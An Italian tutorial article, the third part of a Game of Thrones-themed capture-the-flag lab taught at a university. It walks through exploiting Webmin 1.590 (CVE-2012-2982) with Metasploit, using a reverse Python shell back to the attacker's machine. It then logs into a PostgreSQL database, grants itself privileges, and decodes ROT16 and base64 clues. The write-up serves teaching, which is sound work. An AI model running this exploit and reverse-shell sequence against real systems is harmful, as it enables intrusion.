TECNICHE DI HACKING

Capture The Flag: raccogliamo gli indizi per indentificare una vulnerabilità

Con un’attenta analisi degli indizi trovati all’interno del sistema target, possiamo completare la raccolta delle nostre “bandiere” che ci consentiranno di individuare e identificare tutte le vulnerabilità nascoste. Ecco come procedere

Pubblicato il 23 Lug 2021

Vincenzo Digilio

Cyber Security Expert, Co-Founder CyberACK

Capture the flag parte 3

Dietro l’apparenza “giocosa” di una competizione virtuale in cui bisogna catturare tutte le bandiere disseminate sul terreno di gioco (il sistema target delle nostre analisi), la Capture the Flag (CTF) è una delle tecniche più utilizzate dai team di hacking per ricercare vulnerabilità nei sistemi e nei software.

L’articolo tratta la terza parte della CTF (Capture The Flag) basata sull’universo di Game of Thrones, che ho avuto il piacere di svolgere come lezione per l’Università degli Studi di Perugia, in collaborazione con i Professori Stefano Bistarelli e Francesco Santini (qui, rispettivamente, la prima e la seconda parte della CTF).

Capture The Flag: un nuovo regno da conquistare

Nella scorsa puntata avevamo conquistato le Isole di Ferro (il terzo regno) ed eravamo salpati alla volta delle Terre della Tempesta, dove un nuovo enigma ci stava attendendo. In nostro possesso avevamo solo un nuovo indirizzo, allocato sulla nostra macchina della CTF 192.168.178.80 tramite VirtualHosting: un nome utente ed una password.

    • Indirizzo: http://stormlands.7kingdoms.ctf:10000
    • Username: aryastark
    • Password: N3ddl3_1s_a_g00d_sword#!

Come già visto in precedenza (Parte II – VirtualHosting), ora avremmo dovuto indicare la nostra “rotta” all’interno del file hosts.

Utilizzando l’editor di testo vim effettuai l’accesso al file:

$ vim /etc/hosts

Portandomi al termine del file, entrai in modalità di inserimento schiacciando il tasto “i” ed inserii la nuova riga costituita dall’IP della macchina GOT e il dominio del VirtualHost:

192.168.178.80 stormlands.7kingdoms.ctf

Uscii dalla modalità inserimento premendo il tasto Esc e salvai il file con:wq.

Riaprii il browser e incollai l’indirizzo del VirtualHost: http://stormlands.7kingdoms.ctf:10000. Fu così che approdammo nelle Terre della Tempesta.

All’interno della maschera di login inserii il nome utente e la password. Una volta loggati cliccai su “System Information” e così ci apparve un messaggio di minaccia.

Ma anche una preziosa informazione, la versione del software utilizzato: Webmin era la 1.590.

Alla ricerca di vulnerabilità sfruttabili

La prima cosa che feci fu verificare se, per questa versione, esisteva una vulnerabilità sfruttabile all’interno di Exploit-DB. Per la ricerca utilizzai l’apposito tool da linea di comando:

searchsploit webmin

Così facendo, scoprimmo la presenza di un exploit per la versione 1.580 che faceva riferimento alla CVE-2012-2982. Tale CVE riguardava il file show.cgi e permette l’esecuzione di codice arbitrario sfruttando un bug nella convalidazione dell’input, in tutte le versioni di Webmin a partire dalla 1.590 e precedenti. Vale a dire che potevamo sfruttare il codice dell’exploit anche per la nostra versione.

Non rimaneva che utilizzare l’exploit per aprire una shell sulla macchina bersaglio.

Dopo aver avviato da terminale metasploit, tramite il comando msfconsole, individuai il percorso dell’exploit utilizzando il search:

search webmin

Individuato il percorso, restava da specificare il suo utilizzo:

use exploit/unix/webapp/webmin_show_cgi_exec

Diedi un’occhiata alle varie opzioni disponibili:

show options

e cominciai la fase di settaggio, partendo da username e password:

set USERNAME aryastark

set PASSWORD N3ddl3_1s_a_g00d_sword#!

Il “remote host” era l’Indirizzo IP della nostra macchina bersaglio:

set RHOSTS 192.168.178.80

Anche se non mandatorio, specificai comunque l’indirizzo http del server virtual host:

set VHOST stormlands.7kingdoms.ctf

Il sito non utilizzava SSL, quindi settai l’opzione a “false”:

set SSL false

Come prossimo passo, avremmo dovuto settare il PAYLOAD. Scelsi un reverse_python:

set PAYLOAD cmd/unix/reverse_python

Il “local host” era la nostra macchina attaccante:

set LHOST 192.168.178.3

Lasciai la posta di default: 4444

Pronti a sferrare un attacco

Eravamo pronti a lanciare il nostro attacco digitando il comando exploit.

In pochi secondi la shell sulla macchina fu aperta e il comando ls mi confermò che l’attacco era riuscito.

Ovviamente ci trovavamo nella directory di webmin /usr/share/webmin/file.

Eravamo entrati utilizzando lo username aryastark, quindi poteva essere un’idea dare un’occhiata (se esisteva) alla folder dell’utente.

Digitai quindi un cd / per risalire sino alla root, dirigendomi successivamente nella /home folder:

cd home

Al suo interno trovai un’altra cartella con il nome: aryastark.

Ancora una volta, digitai il comando di “change directoy” per entrarvi:

cd aryastark

La ricerca non era stata vana e al suo interno era presente l’agognato file: flag.txt.

Visualizzai il suo contenuto tramite il comando cat e finalmente conquistammo le Terre della Tempesta!

In base a quello che sapevamo, dall’nmap (Parte I – Figura 4) e dalla cartina dei regni (Parte I – Figura 13), il regno della Montagna e della Valle era un database (DB) in PostgresSQL e, stando al nostro ultimo indizio, avremmo dovuto utilizzare il nostro terminale attraverso il camando psql.

Psql è un terminale interattivo per lavorare con i database PostgreSQL, utilizzato per interrogare i dati dal DB in modo più rapido ed efficace.

La sintassi del comando per connettersi ad un DB che risiede su un host remoto è:

psql –h 192.168.178.80 –d mountainandthevale –U robinarryn

    • psql: comando
    • –h : opzione per specificare l’host remoto
    • 192.168.178.80 : indirizzo IP dell’host remoto
    • –d : opzione per specificare il database a cui ci vogliamo connettere
    • mountainandthevale : il nome del DB
    • –U : opzione per specificare lo username
    • robinarryn : lo username utilizzato

Il terminale mi avvisò che era necessaria la password di cui eravamo in possesso (cr0wn_f0r_a_King-_). Fu così che, pochi istanti dopo, entrammo all’interno del Database mountainandthevale.

La prima cosa che feci, fu listare le tabelle presenti all’interno del DB, utilizzando il comando d.

All’interno del DB erano presenti 8 tabelle, la più interessante pareva essere quella con il nome “flag” . Ma era opportuno dare un’occhiata generale, la prima “SELECT” che feci fu sulla tabella aryas_kill_list.

SELECT * FROM aryas_kill_list;

Al suo interno erano presenti una lista con diversi nomi ed il presunto crimine, ma nessuno (apparentemente) sembrava essere un indizio utile.

La seconda “SELECT” riguardò la table braavos_book . Nella nostra mappa dei regni (parte I figura 13) veniva fatta una menzione relativa ad una delle tre “Flag Extra”: “City of Braavos”; quindi con molta probabilità eravamo vicini ad una di queste flag extra.

SELECT * FROM braavos_book;

Nel box sottostante, ci parve di aver trovato qualcosa di interessante:

Il testo al punto 9 pareva essere criptato con un cifrario monoalfabetico. Il più famoso è noto come ROT13, che sta per “rotate by 13 places”, e si rifà ad uno dei più antichi algoritmi crittografici, il cifrario di Cesare. Il funzionamento del cifrario è abbastanza semplice: ogni singola lettera del testo in chiaro viene sostituita, nel messaggio cifrato, con una lettera che si trova ad un dato numero di posizioni nell’alfabeto.

Ad esempio: se il testo in chiaro “CTF” venisse criptato con una chiave pari a 3 posizioni, ogni lettera subirebbe uno shift in avanti di 3 posizioni nell’alfabeto. Per cui il messaggio CTF, criptato, diverrebbe:

  • Lettera C, shift in avanti di 3 lettere = F
  • Lettera T, shift in avanti di 3 lettere = W
  • Lettera F, shift in avanti di 3 lettere = I

Il risultato del processo di cifratura sarà: FWI .

In maniera abbastanza immediata, se vogliamo risalire al messaggio originale, ci basterà applicare uno shift alfabetico di 3 lettere indietro per risalire al testo in chiaro, cioè “CTF”.

A questo punto non restava che domandarsi di quanto fosse lo shift applicato. Dopo vari tentativi scoprii che si trattava di un ROT16: il messaggio veniva quindi criptato con una chiave pari a 16 posizioni dopo dell’alfabeto.

Se volete fare una verifica veloce, potete scaricare CrypTool. Una volta installato, copiate ed incollate il testo cifrato, selezionate dalla barra in alto Encrypt/Decrypt , nel menu a tendina scegliete Symmetric (classic) ed infine cliccate su Caesar / ROT-13. La variante che dovrete scegliere è Caesar. Nel menu “Key entry as” scegliete “Number value” 16 ed infine cliccate su Encrypt.

Il messaggio ci stava quindi suggerendo di connetterci ad un altro database di nome braavos e inserire la password ValarMorghulis . Tuttavia, non eravamo ancora in possesso del nome utente con il quale effettuare la connessione al DB. Il messaggio, però, recava un altro indizio: il nome utente che stavamo cercando era uno di quelli presenti all’interno della tabella aryas_kill_list corrispondente al “numero di pagina perso”.

Decisi, per un attimo, di lasciare da parte la ricerca del misterioso utente e di continuare con le SELECT, proseguendo con:

SELECT * FROM eyrie;

Nulla di particolare destò la mia attenzione.

Adesso, era il turno della fatidica tabella che recava il nome flag:

SELECT * FROM flag;

Permesso negat.! Non avevamo i permessi per accedere alla table. Provai quindi ad assegnare tutti i privilegi delle tabelle, appartenenti allo “schema” public, al nostro nome utente: robinarryn.

GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO robinarryn;

Riprovai quindi la SELECT sulla nostra tabella “flag”: SELECT * FROM flag;.

Questa volta il comando ci permise di accedere al contenuto della “table”.

Il testo della flag pareva essere cifrato anche questa volta, ma i due caratteri “==” al termine del messaggio mi fecero sospettare un semplice encode in base64. Tale codifica consente la traduzione di dati binari in stringhe di testo nell’American Standard Code for Information Interchange (ASCII). Viene usato principalmente nella codifica di dati binari nelle e-mail, per convertire dati nel suddetto formato.

Aprii quindi un secondo terminale e copiai il messaggio all’interno del seguente comando:

echo TmljZSEgeW91IGNvbnF1ZXJlZCB0aGUgS2luZ2RvbSBvZiB0aGUgTW91bnRhaW4gYW5kIHRoZSBWYWxlLiBUaGlzIGlzIHlvdXIgZmxhZzogYmIzYWVjMGZkY2RiYzI5NzQ4OTBmODA1YzU4NWQ0MzIuIE5leHQgc3RvcCB0aGUgS2luZ2RvbSBvZiB0aGUgUmVhY2guIFlvdSBjYW4gaWRlbnRpZnkgeW91cnNlbGYgd2l0aCB0aGlzIHVzZXIvcGFzcyBjb21iaW5hdGlvbjogb2xlbm5hdHlyZWxsQDdraW5nZG9tcy5jdGYvSDFnaC5HYXJkM24ucG93YWggLCBidXQgZmlyc3QgeW91IG11c3QgYmUgYWJsZSB0byBvcGVuIHRoZSBnYXRlcw== | base64 –d

    • echo : stampa a video
    • TmljZSEgeW91I[..] : l’encode della flag in base64
    • | : operatore di concatenazione “pipe” che permette a due processi separati di comunicare fra loro
    • base64 : tool per la decodifica
    • -d : opzione di decodifica

Avevamo conquistato anche il regno della Montagna e della Valle, ma non era ancora tempo di partire. Pima di lasciare queste terre per sempre, dovevamo dirimere l’enigma che si celava dietro al nome del misterioso utente legato alla Città di Braavos…

To be continued…

Valuta la qualità di questo articolo

La tua opinione è importante per noi!

Speciale PNRR

Tutti
Incentivi
Salute digitale
Formazione
Analisi
Sostenibilità
PA
Sostemibilità
Sicurezza
Digital Economy
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr

Articoli correlati